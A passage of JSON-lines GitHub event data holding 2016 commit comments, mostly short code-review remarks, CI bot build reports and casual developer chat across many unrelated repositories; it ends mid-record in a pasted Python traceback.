{"id":"4585613142","type":"CommitCommentEvent","actor":{"login":"jimmidyson"},"repo":{"name":"fabric8io/elasticsearch-cloud-kubernetes"},"payload":{"comment":{"id":19084897,"position":64,"line":174,"path":"pom.xml","commit_id":"ec06ed57c51bb3fd0ed7331d1f9fac27f6e89c3a","created_at":"2016-09-19T20:09:06Z","updated_at":"2016-09-19T20:09:06Z","body":"It's probably not strictly necessary, but Java 1.7 was EOL a long time ago now so would recommend running with Java 1.8. Why do you want to run with Java 1.7?"}},"created_at":"2016-09-19T20:09:06Z"}
{"id":"4585614830","type":"CommitCommentEvent","actor":{"login":"dagar"},"repo":{"name":"PX4/Firmware"},"payload":{"comment":{"id":19084902,"position":19,"line":175,"path":"src/modules/navigator/mission_params.c","commit_id":"84fa1dc4816b3d6a90cf0d02bf4d8d1c30b511af","created_at":"2016-09-19T20:09:25Z","updated_at":"2016-09-19T20:09:25Z","body":"You can use @boolean and drop the other metadata"}},"created_at":"2016-09-19T20:09:25Z"}
{"id":"4585615013","type":"CommitCommentEvent","actor":{"login":"Chronophobe"},"repo":{"name":"software-engineering-amsterdam/ST-2016-wo1-5"},"payload":{"comment":{"id":19084903,"position":22,"line":22,"path":"Week 2/ahmed/Exercise6.hs","commit_id":"6620a76cd3f38dc148c8bda6718e7fd2cf10ee3a","created_at":"2016-09-19T20:09:28Z","updated_at":"2016-09-19T20:09:28Z","body":"Doesn't this look awfully familiar to an existing haskell function with the signature `(a -> Bool) -> [a] -> [a]`? ;)"}},"created_at":"2016-09-19T20:09:28Z"}
{"id":"4585615086","type":"CommitCommentEvent","actor":{"login":"dagar"},"repo":{"name":"PX4/Firmware"},"payload":{"comment":{"id":19084904,"position":29,"line":185,"path":"src/modules/navigator/mission_params.c","commit_id":"84fa1dc4816b3d6a90cf0d02bf4d8d1c30b511af","created_at":"2016-09-19T20:09:29Z","updated_at":"2016-09-19T20:09:29Z","body":"@boolean"}},"created_at":"2016-09-19T20:09:29Z"}
{"id":"4585615505","type":"CommitCommentEvent","actor":{"login":"kripod"},"repo":{"name":"kripod/bme-vik-info"},"payload":{"comment":{"id":19084906,"position":3,"line":3,"path":"bsc-01/prog/peldak/het-01/05-osszetett-vezerlesi-szerkezetek/szorzotabla-fejleccel/c/main.c","commit_id":"2c1f0cd2df04180d0e3b0565c527a42b65d46b88","created_at":"2016-09-19T20:09:33Z","updated_at":"2016-09-19T20:09:33Z","body":"Igazad van, légyszíves, be tudnál küldeni egy PR-t a `static`-ok kitörlésére? :blush:"}},"created_at":"2016-09-19T20:09:33Z"}
{"id":"4585616467","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19084910,"position":10,"line":10,"path":"browser/js/products/products.html","commit_id":"4a11415c7ac724e6da5abd9b93e3d8049fcfa31e","created_at":"2016-09-19T20:09:45Z","updated_at":"2016-09-19T20:09:45Z","body":"Might these `product`s work well as element directives?"}},"created_at":"2016-09-19T20:09:45Z"}
{"id":"4585617420","type":"CommitCommentEvent","actor":{"login":"dagar"},"repo":{"name":"PX4/Firmware"},"payload":{"comment":{"id":19084911,"position":8,"line":176,"path":"src/modules/navigator/navigator_params.c","commit_id":"84fa1dc4816b3d6a90cf0d02bf4d8d1c30b511af","created_at":"2016-09-19T20:09:57Z","updated_at":"2016-09-19T20:09:57Z","body":"@boolean ?"}},"created_at":"2016-09-19T20:09:57Z"}
{"id":"4585619128","type":"CommitCommentEvent","actor":{"login":"Maxr1998"},"repo":{"name":"wasdennnoch/AndroidN-ify"},"payload":{"comment":{"id":19084913,"position":5,"line":182,"path":"app/src/main/java/tk/wasdennnoch/androidn_ify/systemui/notifications/NotificationHooks.java","commit_id":"b85c10bf01ef4711716430a559f2e705145daf05","created_at":"2016-09-19T20:10:16Z","updated_at":"2016-09-19T20:10:16Z","body":"Why?\r\nSince the headsUpChild is null on L anyway, we don't even pass the first if in addRemoteInput."}},"created_at":"2016-09-19T20:10:16Z"}
{"id":"4585620066","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19084916,"position":10,"line":10,"path":"browser/js/cart/cart.html","commit_id":"4a11415c7ac724e6da5abd9b93e3d8049fcfa31e","created_at":"2016-09-19T20:10:25Z","updated_at":"2016-09-19T20:10:25Z","body":"Might these `product`s work as an element directive?"}},"created_at":"2016-09-19T20:10:25Z"}
{"id":"4585621143","type":"CommitCommentEvent","actor":{"login":"apoleshchuk"},"repo":{"name":"ewgRa/de_faq"},"payload":{"comment":{"id":19084918,"position":14,"line":36,"path":"Авто.md","commit_id":"887ae7afb2c56df2751f4b99e4e29e815c76b038","created_at":"2016-09-19T20:10:38Z","updated_at":"2016-09-19T20:10:38Z","body":"@dollar2048, спасибо за ценную информацию! в следующий раз обязательно так попробуем :)"}},"created_at":"2016-09-19T20:10:38Z"}
{"id":"4585621696","type":"CommitCommentEvent","actor":{"login":"thokall"},"repo":{"name":"SciLifeLab/courses"},"payload":{"comment":{"id":19084920,"position":null,"line":null,"path":null,"commit_id":"62a0cdbed1f244771a21a9c5b5ca49053fda034c","created_at":"2016-09-19T20:10:45Z","updated_at":"2016-09-19T20:10:45Z","body":"Thanks, I am to blame should try and pay closer attention next time."}},"created_at":"2016-09-19T20:10:45Z"}
{"id":"4585621700","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"AOSP-JF-MM/platform_manifest"},"payload":{"comment":{"id":19084921,"position":null,"line":null,"path":null,"commit_id":"7d06fd62dd20655961730cfe4f1ea83adf26061c","created_at":"2016-09-19T20:10:45Z","updated_at":"2016-09-19T20:10:45Z","body":"shouldnt we execute loki from install/bin \r\nand \r\nadd \r\nPRODUCT_COPY_FILES += \\\r\n    device/samsung/jflte/releasetools/loki.sh:install/bin/loki.sh\r\nto mk file ? :/ ...just curious"}},"created_at":"2016-09-19T20:10:45Z"}
{"id":"4585622546","type":"CommitCommentEvent","actor":{"login":"mentor-kk"},"repo":{"name":"agims7/test"},"payload":{"comment":{"id":19084924,"position":4,"line":28,"path":"Gruntfile.js","commit_id":"c1052df881a6e4792327508673ac11016c00dac6","created_at":"2016-09-19T20:10:54Z","updated_at":"2016-09-19T20:10:54Z","body":"2 x `files` ?"}},"created_at":"2016-09-19T20:10:54Z"}
{"id":"4585624330","type":"CommitCommentEvent","actor":{"login":"hkupty"},"repo":{"name":"zegervdv/iron.nvim"},"payload":{"comment":{"id":19084928,"position":null,"line":null,"path":null,"commit_id":"8ee69e4f00ac6b026ee00d622b92646de5d465b5","created_at":"2016-09-19T20:11:15Z","updated_at":"2016-09-19T20:11:15Z","body":"Sorry to bother, but would you mind to open a PR for that?\r\n\r\nI bet some more people will benefit from tcl support :smiley: "}},"created_at":"2016-09-19T20:11:15Z"}
{"id":"4585627821","type":"CommitCommentEvent","actor":{"login":"dahlo"},"repo":{"name":"SciLifeLab/courses"},"payload":{"comment":{"id":19084938,"position":null,"line":null,"path":null,"commit_id":"62a0cdbed1f244771a21a9c5b5ca49053fda034c","created_at":"2016-09-19T20:11:54Z","updated_at":"2016-09-19T20:11:54Z","body":"No cake for you then :)"}},"created_at":"2016-09-19T20:11:54Z"}
{"id":"4585630271","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19084942,"position":11,"line":11,"path":"browser/js/cart/cart.js","commit_id":"4a11415c7ac724e6da5abd9b93e3d8049fcfa31e","created_at":"2016-09-19T20:12:23Z","updated_at":"2016-09-19T20:12:23Z","body":"Have you looked at the `AuthService`? Seems like that is meant to be used by controllers / factories more than the `SessionService`."}},"created_at":"2016-09-19T20:12:23Z"}
{"id":"4585631487","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19084945,"position":15,"line":15,"path":"browser/js/cart/cart.js","commit_id":"4a11415c7ac724e6da5abd9b93e3d8049fcfa31e","created_at":"2016-09-19T20:12:36Z","updated_at":"2016-09-19T20:12:36Z","body":"Don't forget to `catch`."}},"created_at":"2016-09-19T20:12:36Z"}
{"id":"4585631613","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19084946,"position":null,"line":null,"path":null,"commit_id":"d870b343701f3d56738e015973489e1e9b4a6585","created_at":"2016-09-19T20:12:37Z","updated_at":"2016-09-19T20:12:37Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-d870b343701f3d56738e015973489e1e9b4a6585-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-19T20:12:37Z"}
{"id":"4585631835","type":"CommitCommentEvent","actor":{"login":"the-Arioch"},"repo":{"name":"pleriche/FastMM4"},"payload":{"comment":{"id":19084947,"position":null,"line":null,"path":null,"commit_id":"3e0b924d4b1c07ac91817f42567dfa24f2510c2b","created_at":"2016-09-19T20:12:40Z","updated_at":"2016-09-19T20:12:40Z","body":"Funny... EMBT tried to optimize their fork (make multi-platform?) and in the end made leak reporting unusable with console apps... http://stackoverflow.com/q/39579740/976391"}},"created_at":"2016-09-19T20:12:40Z"}
{"id":"4585634482","type":"CommitCommentEvent","actor":{"login":"Maxr1998"},"repo":{"name":"wasdennnoch/AndroidN-ify"},"payload":{"comment":{"id":19084957,"position":null,"line":null,"path":null,"commit_id":"73238c17012621c463756f228f5c599d6b15321a","created_at":"2016-09-19T20:13:10Z","updated_at":"2016-09-19T20:13:10Z","body":"Maybe first check with `param.args[isWide] instanceof boolean`?"}},"created_at":"2016-09-19T20:13:10Z"}
{"id":"4585637966","type":"CommitCommentEvent","actor":{"login":"xt0rted"},"repo":{"name":"gztchan/awesome-design"},"payload":{"comment":{"id":19084966,"position":null,"line":null,"path":null,"commit_id":"44a1bde497bad7666735bd1a051922e9a095ff3c","created_at":"2016-09-19T20:13:48Z","updated_at":"2016-09-19T20:13:48Z","body":"@gztchan that was another spam account"}},"created_at":"2016-09-19T20:13:48Z"}
{"id":"4585638214","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19084967,"position":27,"line":27,"path":"browser/js/cart/cart.js","commit_id":"4a11415c7ac724e6da5abd9b93e3d8049fcfa31e","created_at":"2016-09-19T20:13:50Z","updated_at":"2016-09-19T20:13:50Z","body":"Any reason you cannot rewrite `removeFromCart` to give back a promise for the updated `cart`? Then you wouldn't need the extra `getCart` line."}},"created_at":"2016-09-19T20:13:50Z"}
{"id":"4585638401","type":"CommitCommentEvent","actor":{"login":"remram44"},"repo":{"name":"ViDA-NYU/reprozip-examples"},"payload":{"comment":{"id":19084968,"position":null,"line":null,"path":null,"commit_id":"ccd0cc6d9cab07de851281d2a1192e564cf75239","created_at":"2016-09-19T20:13:52Z","updated_at":"2016-09-19T20:13:52Z","body":"Wouldn't it have been better to lock the original pandas version in the requirements file? The original code works with pandas 0.18.0\r\n\r\nAlso, `0.18.0` is what I see in the requirements you committed (not `0.18.1`)."}},"created_at":"2016-09-19T20:13:52Z"}
{"id":"4585639534","type":"CommitCommentEvent","actor":{"login":"kecnry"},"repo":{"name":"phoebe-project/phoebe2"},"payload":{"comment":{"id":19084974,"position":null,"line":null,"path":null,"commit_id":"df31da381768442212638a9a7da483cc622a6d81","created_at":"2016-09-19T20:14:05Z","updated_at":"2016-09-19T20:14:05Z","body":"this closes #81 "}},"created_at":"2016-09-19T20:14:05Z"}
{"id":"4585641217","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19084976,"position":null,"line":null,"path":null,"commit_id":"a6eaa4e89b208b22624600118ff186249357951f","created_at":"2016-09-19T20:14:22Z","updated_at":"2016-09-19T20:14:22Z","body":"os_2_0_develop (kbenne) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a6eaa4e89b208b22624600118ff186249357951f-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a6eaa4e89b208b22624600118ff186249357951f-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-19T20:14:22Z"}
{"id":"4585642060","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19084978,"position":27,"line":27,"path":"browser/js/cart/cart.js","commit_id":"4a11415c7ac724e6da5abd9b93e3d8049fcfa31e","created_at":"2016-09-19T20:14:32Z","updated_at":"2016-09-19T20:14:32Z","body":"For that matter, the ideal `cart` would be a singleton object which `CartFactory` always updates, using stuff like `angular.copy` as we saw in the caching examples."}},"created_at":"2016-09-19T20:14:32Z"}
{"id":"4585642670","type":"CommitCommentEvent","actor":{"login":"Fahrenhei7"},"repo":{"name":"Fahrenhei7/storyline"},"payload":{"comment":{"id":19084981,"position":null,"line":null,"path":null,"commit_id":"d497ca8b63b7118214e82cef66a2d3001f31c81f","created_at":"2016-09-19T20:14:39Z","updated_at":"2016-09-19T20:14:39Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;uFI5q2CL&#x2F;2-user\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> User</a>"}},"created_at":"2016-09-19T20:14:39Z"}
{"id":"4585643294","type":"CommitCommentEvent","actor":{"login":"Fahrenhei7"},"repo":{"name":"Fahrenhei7/storyline"},"payload":{"comment":{"id":19084982,"position":null,"line":null,"path":null,"commit_id":"55f6b33d8507b2705ec4fa9d60d7f11167a82809","created_at":"2016-09-19T20:14:45Z","updated_at":"2016-09-19T20:14:45Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;uFI5q2CL&#x2F;2-user\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> User</a>"}},"created_at":"2016-09-19T20:14:45Z"}
{"id":"4585643533","type":"CommitCommentEvent","actor":{"login":"Fahrenhei7"},"repo":{"name":"Fahrenhei7/storyline"},"payload":{"comment":{"id":19084984,"position":null,"line":null,"path":null,"commit_id":"af2438504e93c6256df88e170098673bae74199d","created_at":"2016-09-19T20:14:49Z","updated_at":"2016-09-19T20:14:49Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;uFI5q2CL&#x2F;2-user\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> User</a>"}},"created_at":"2016-09-19T20:14:49Z"}
{"id":"4585645134","type":"CommitCommentEvent","actor":{"login":"sidey79"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":19084990,"position":38,"line":1367,"path":"FHEM/00_SIGNALduino.pm","commit_id":"86f6fdb810699ad68560c7aa70954429b5e2607c","created_at":"2016-09-19T20:15:06Z","updated_at":"2016-09-19T20:15:06Z","body":"Was hat sich denn am Format geändert?"}},"created_at":"2016-09-19T20:15:06Z"}
{"id":"4585658764","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19085007,"position":22,"line":22,"path":"browser/js/login/login.js","commit_id":"4a11415c7ac724e6da5abd9b93e3d8049fcfa31e","created_at":"2016-09-19T20:17:34Z","updated_at":"2016-09-19T20:17:34Z","body":"`AuthService.login` should handle telling the `CartFactory` to merge/create/update data. Otherwise you need this kind of logic repeated everywhere the method is used."}},"created_at":"2016-09-19T20:17:34Z"}
{"id":"4585664238","type":"CommitCommentEvent","actor":{"login":"SubJunk"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":19085015,"position":null,"line":null,"path":null,"commit_id":"ef4c906886b65109fafb2af873c815b2e3bce500","created_at":"2016-09-19T20:18:32Z","updated_at":"2016-09-19T20:18:32Z","body":"@UniversalMediaServer/developers I've disabled pushing directly to master again so everything has to go through pull requests. Feel free to make tiny pull requests for formatting or anything, I just wanted to give more visibility and chance for discussion before every change."}},"created_at":"2016-09-19T20:18:32Z"}
{"id":"4585667262","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19085021,"position":46,"line":46,"path":"browser/js/cart/cart.js","commit_id":"4a11415c7ac724e6da5abd9b93e3d8049fcfa31e","created_at":"2016-09-19T20:19:05Z","updated_at":"2016-09-19T20:19:05Z","body":"This shouldn't be a nested chain but rather close the `.then` and continue in the next `.then`."}},"created_at":"2016-09-19T20:19:05Z"}
{"id":"4585668735","type":"CommitCommentEvent","actor":{"login":"troianoandres"},"repo":{"name":"iisidro/iisidro-web"},"payload":{"comment":{"id":19085022,"position":7,"line":23,"path":"application/controllers/app/admin/surveys/SurveysListController.js","commit_id":"4944d1851aea391d53f9b6d3f294a6f54fe4ba56","created_at":"2016-09-19T20:19:19Z","updated_at":"2016-09-19T20:19:19Z","body":"Eso es un objeto? no seria `{surveyId: survey.id}`"}},"created_at":"2016-09-19T20:19:19Z"}
{"id":"4585670608","type":"CommitCommentEvent","actor":{"login":"sonora"},"repo":{"name":"osmandapp/Osmand"},"payload":{"comment":{"id":19085026,"position":null,"line":null,"path":null,"commit_id":"f6301008cc551a18f04bb62af7f9a971652fa88f","created_at":"2016-09-19T20:19:38Z","updated_at":"2016-09-19T20:19:38Z","body":"I guess we should revert this now?"}},"created_at":"2016-09-19T20:19:38Z"}
{"id":"4585673055","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19085038,"position":null,"line":null,"path":null,"commit_id":"a6eaa4e89b208b22624600118ff186249357951f","created_at":"2016-09-19T20:20:03Z","updated_at":"2016-09-19T20:20:03Z","body":"os_2_0_develop (kbenne) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a6eaa4e89b208b22624600118ff186249357951f-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-19T20:20:03Z"}
{"id":"4585673580","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19085040,"position":46,"line":46,"path":"browser/js/product/product.html","commit_id":"4a11415c7ac724e6da5abd9b93e3d8049fcfa31e","created_at":"2016-09-19T20:20:10Z","updated_at":"2016-09-19T20:20:10Z","body":"You can probably make these dynamically with an `ng-repeat`."}},"created_at":"2016-09-19T20:20:10Z"}
{"id":"4585674984","type":"CommitCommentEvent","actor":{"login":"wasdennnoch"},"repo":{"name":"wasdennnoch/AndroidN-ify"},"payload":{"comment":{"id":19085044,"position":5,"line":182,"path":"app/src/main/java/tk/wasdennnoch/androidn_ify/systemui/notifications/NotificationHooks.java","commit_id":"b85c10bf01ef4711716430a559f2e705145daf05","created_at":"2016-09-19T20:20:24Z","updated_at":"2016-09-19T20:20:24Z","body":"But the non-existent mHeadsUpManager still gets fetched which should produce a FieldNotFoundException from my understanding. And if not, it is better to understand with this check ;)"}},"created_at":"2016-09-19T20:20:24Z"}
{"id":"4585683347","type":"CommitCommentEvent","actor":{"login":"wasdennnoch"},"repo":{"name":"wasdennnoch/AndroidN-ify"},"payload":{"comment":{"id":19085063,"position":null,"line":null,"path":null,"commit_id":"73238c17012621c463756f228f5c599d6b15321a","created_at":"2016-09-19T20:21:49Z","updated_at":"2016-09-19T20:21:49Z","body":"Guess what - I did exactly that :) https://github.com/wasdennnoch/AndroidN-ify/blob/3b9fb9849435ef5cf01365fba870bf3404193773/app/src/main/java/tk/wasdennnoch/androidn_ify/systemui/statusbar/StatusBarHooks.java#L119"}},"created_at":"2016-09-19T20:21:49Z"}
{"id":"4585684908","type":"CommitCommentEvent","actor":{"login":"ksmith0"},"repo":{"name":"pixie16/paass"},"payload":{"comment":{"id":19085067,"position":null,"line":null,"path":null,"commit_id":"d2c295d351387f0ce42577c8ff34d10699c3147a","created_at":"2016-09-19T20:22:05Z","updated_at":"2016-09-19T20:22:05Z","body":"This commit removed PxiDump from compiling."}},"created_at":"2016-09-19T20:22:05Z"}
{"id":"4585689856","type":"CommitCommentEvent","actor":{"login":"DanForbes"},"repo":{"name":"joyent/libuv"},"payload":{"comment":{"id":19085080,"position":null,"line":null,"path":null,"commit_id":"804d40ee14dc0f82c482dcc8d1c41c14333fcb48","created_at":"2016-09-19T20:22:58Z","updated_at":"2016-09-19T20:22:58Z","body":"You can now [lock GitHub conversations](https://github.com/blog/1847-locking-conversations)."}},"created_at":"2016-09-19T20:22:58Z"}
{"id":"4585693355","type":"CommitCommentEvent","actor":{"login":"Quizno97"},"repo":{"name":"Quizno97/Lab-1"},"payload":{"comment":{"id":19085092,"position":null,"line":null,"path":null,"commit_id":"27bb407eff6dd0f7dc6fdcf909051abd0f899162","created_at":"2016-09-19T20:23:39Z","updated_at":"2016-09-19T20:23:39Z","body":"public class myInteger {\r\nprivate int value;\r\n\tpublic static void main(String[] args) {\r\n\t\t\r\n\r\n\t}\r\n\tpublic int getValue() {\r\n\t\treturn value;\r\n\t}\r\n\tpublic static boolean isEven(int num){\r\n\t\tif((num %2) == 0)\r\n\t\t\treturn true;\r\n\t\telse\r\n\t\t\t\treturn false;\r\n\t}\r\n\tpublic static boolean isOdd(int num){\r\n\t\treturn(!myInteger.isEven(num));\r\n\t}\r\n\tpublic boolean isEven(){\r\n\t\treturn myInteger.isEven(value);\r\n\t}\r\n\tpublic void setValue(int value) {\r\n\t\tthis.value = value;\r\n\t}\r\n}"}},"created_at":"2016-09-19T20:23:39Z"}
{"id":"4585693725","type":"CommitCommentEvent","actor":{"login":"nebulon42"},"repo":{"name":"gravitystorm/openstreetmap-carto"},"payload":{"comment":{"id":19085095,"position":5,"line":5,"path":"CHANGELOG.md","commit_id":"5ee3078d492afcdb320607d203e6964354d7a8c4","created_at":"2016-09-19T20:23:42Z","updated_at":"2016-09-19T20:23:42Z","body":"Should be \"code of conduct\" instead of \"code of conducted\"."}},"created_at":"2016-09-19T20:23:42Z"}
{"id":"4585694876","type":"CommitCommentEvent","actor":{"login":"Razpudding"},"repo":{"name":"CMDA/Frontend-3"},"payload":{"comment":{"id":19085099,"position":null,"line":null,"path":null,"commit_id":"97742c46dea86ec85035c2f513160f33191e2602","created_at":"2016-09-19T20:23:53Z","updated_at":"2016-09-19T20:23:53Z","body":"first I changed the ignore file to make sure my labels example was excluded from the commit. But then I realized how annoying it would be for students to check out the code through other means so I decided to add my example to the repo anyway. Git counted it as two separate changes, hence the confusion. Should work in the last commit."}},"created_at":"2016-09-19T20:23:53Z"}
{"id":"4585695076","type":"CommitCommentEvent","actor":{"login":"ruslangaripov"},"repo":{"name":"Serg-Norseman/GEDKeeper"},"payload":{"comment":{"id":19085100,"position":62,"line":347,"path":"projects/GKCommon/GKCommon/UDN.cs","commit_id":"c64e3b828abebafa062fab7464c51adb8012b7c7","created_at":"2016-09-19T20:23:55Z","updated_at":"2016-09-19T20:23:55Z","body":"\"The 3rd versions\" already return `uint`. We don't need type casting here."}},"created_at":"2016-09-19T20:23:55Z"}
{"id":"4585695362","type":"CommitCommentEvent","actor":{"login":"Woland2k"},"repo":{"name":"VirtoCommerce/vc-content"},"payload":{"comment":{"id":19085101,"position":null,"line":null,"path":null,"commit_id":"da550dde999fce8b1c08302a614ddb838a7b50dd","created_at":"2016-09-19T20:23:59Z","updated_at":"2016-09-19T20:23:59Z","body":"Lets not hard code the style inside the theme."}},"created_at":"2016-09-19T20:23:59Z"}
{"id":"4585695380","type":"CommitCommentEvent","actor":{"login":"ksmith0"},"repo":{"name":"pixie16/paass"},"payload":{"comment":{"id":19085102,"position":215,"line":133,"path":"CMakeLists.txt","commit_id":"d2c295d351387f0ce42577c8ff34d10699c3147a","created_at":"2016-09-19T20:23:59Z","updated_at":"2016-09-19T20:23:59Z","body":"This commit removed PxiDump from compiling leading to issue #89."}},"created_at":"2016-09-19T20:23:59Z"}
{"id":"4585696984","type":"CommitCommentEvent","actor":{"login":"chee"},"repo":{"name":"jelly/morsejs"},"payload":{"comment":{"id":19085106,"position":null,"line":null,"path":null,"commit_id":"a9e7d69b2c29b493f153b3de22dd6a1f604babd8","created_at":"2016-09-19T20:24:17Z","updated_at":"2016-09-19T20:24:17Z","body":"🙃 ❤️ "}},"created_at":"2016-09-19T20:24:17Z"}
{"id":"4585706469","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"johanna08/pasturetopantry"},"payload":{"comment":{"id":19085128,"position":4,"line":4,"path":"browser/js/admin/admin.factory.js","commit_id":"deaee48e5825249168239d10bd6a05abfcf49aff","created_at":"2016-09-19T20:26:04Z","updated_at":"2016-09-19T20:26:04Z","body":"nice way to DRY up the code"}},"created_at":"2016-09-19T20:26:04Z"}
{"id":"4585708916","type":"CommitCommentEvent","actor":{"login":"paigr"},"repo":{"name":"paigr/clanboard"},"payload":{"comment":{"id":19085131,"position":17,"line":5,"path":"src/components/Post.vue","commit_id":"82b85697f3427ff4ea859af4fd9b9c618ebeae1d","created_at":"2016-09-19T20:26:31Z","updated_at":"2016-09-19T20:26:31Z","body":"Why remove `babel` here @ackl?"}},"created_at":"2016-09-19T20:26:31Z"}
{"id":"4585709170","type":"CommitCommentEvent","actor":{"login":"steelbrain"},"repo":{"name":"epoberezkin/ajv"},"payload":{"comment":{"id":19085132,"position":null,"line":null,"path":null,"commit_id":"acfd035720193bcff8b365c204dad1a7ae3d6194","created_at":"2016-09-19T20:26:34Z","updated_at":"2016-09-19T20:26:34Z","body":"Just a FYI, if you replaced/renamed this to hide/bypass the error of Chromium's no-eval policy as seen in Chromium Packaged Apps and Electron BrowserWindows, this change makes no difference as those policies blacklist both `eval` and `new Function(...)`"}},"created_at":"2016-09-19T20:26:34Z"}
{"id":"4585711887","type":"CommitCommentEvent","actor":{"login":"Felp86120502"},"repo":{"name":"antoinepaul/antoinepaul"},"payload":{"comment":{"id":19085139,"position":null,"line":null,"path":null,"commit_id":"403bf2203e41faba7c930f75a44f6be7cb943ed2","created_at":"2016-09-19T20:27:05Z","updated_at":"2016-09-19T20:27:05Z","body":"Demain, s'aprem t'es sur les ordis jusqu'à quelle heure?"}},"created_at":"2016-09-19T20:27:05Z"}
{"id":"4585712139","type":"CommitCommentEvent","actor":{"login":"joelittlejohn"},"repo":{"name":"dakrone/clj-http"},"payload":{"comment":{"id":19085140,"position":null,"line":null,"path":null,"commit_id":"7ec10113776655d04234edcb3238a5a50943980a","created_at":"2016-09-19T20:27:08Z","updated_at":"2016-09-19T20:27:08Z","body":"Excellent, thanks. @dakrone you are a living legend 😍 "}},"created_at":"2016-09-19T20:27:08Z"}
{"id":"4585714830","type":"CommitCommentEvent","actor":{"login":"Kovah"},"repo":{"name":"InvoicePlane/InvoicePlane"},"payload":{"comment":{"id":19085145,"position":null,"line":null,"path":null,"commit_id":"6c1cb132dd57cba31907c163c46293be16021876","created_at":"2016-09-19T20:27:38Z","updated_at":"2016-09-19T20:27:38Z","body":"Replace `$config['base_url'] = '';` with `$config['base_url'] = 'http://yourdomainhere.com';`"}},"created_at":"2016-09-19T20:27:38Z"}
{"id":"4585716906","type":"CommitCommentEvent","actor":{"login":"akisch"},"repo":{"name":"akisch/S4"},"payload":{"comment":{"id":19085154,"position":null,"line":null,"path":null,"commit_id":"7785177f4a3d84cbf4e96cd85edf56bc1e553e34","created_at":"2016-09-19T20:28:01Z","updated_at":"2016-09-19T20:28:01Z","body":"nice! good call"}},"created_at":"2016-09-19T20:28:01Z"}
{"id":"4585717996","type":"CommitCommentEvent","actor":{"login":"clsid2"},"repo":{"name":"XhmikosR/mpc-hc"},"payload":{"comment":{"id":19085161,"position":null,"line":null,"path":null,"commit_id":"9b21a5e057c4bb07ef27b11412a816abc20fc445","created_at":"2016-09-19T20:28:13Z","updated_at":"2016-09-19T20:28:13Z","body":"@XhmikosR @kasper93\r\n\r\nHi guys. Time for a new stable release?"}},"created_at":"2016-09-19T20:28:13Z"}
{"id":"4585718096","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"oe-alliance/XMLTV-Import"},"payload":{"comment":{"id":19085162,"position":null,"line":null,"path":null,"commit_id":"88ca59a3aa3857a3c950fcf2d193d319869a9db8","created_at":"2016-09-19T20:28:14Z","updated_at":"2016-09-19T20:28:14Z","body":"2:12:44.965 {   } Plugins/Extensions/EPGImport/log.py:25 write [EPGImport] starting import because auto-run on boot is enabled\r\nTraceback (most recent call last):\r\n  File \"/usr/lib/enigma2/python/mytest.py\", line 207, in init\r\n    p(reason=0, session=self)\r\n  File \"/usr/lib/enigma2/python/Plugins/Extensions/EPGImport/plugin.py\", line 995, in autostart\r\n  File \"/usr/lib/enigma2/python/Plugins/Extensions/EPGImport/plugin.py\", line 980, in onBootStartCheck\r\n  File \"/usr/lib/enigma2/python/Plugins/Extensions/EPGImport/plugin.py\", line 852, in runImport\r\n  File \"/usr/lib/enigma2/python/Plugins/Extensions/EPGImport/plugin.py\", line 213, in 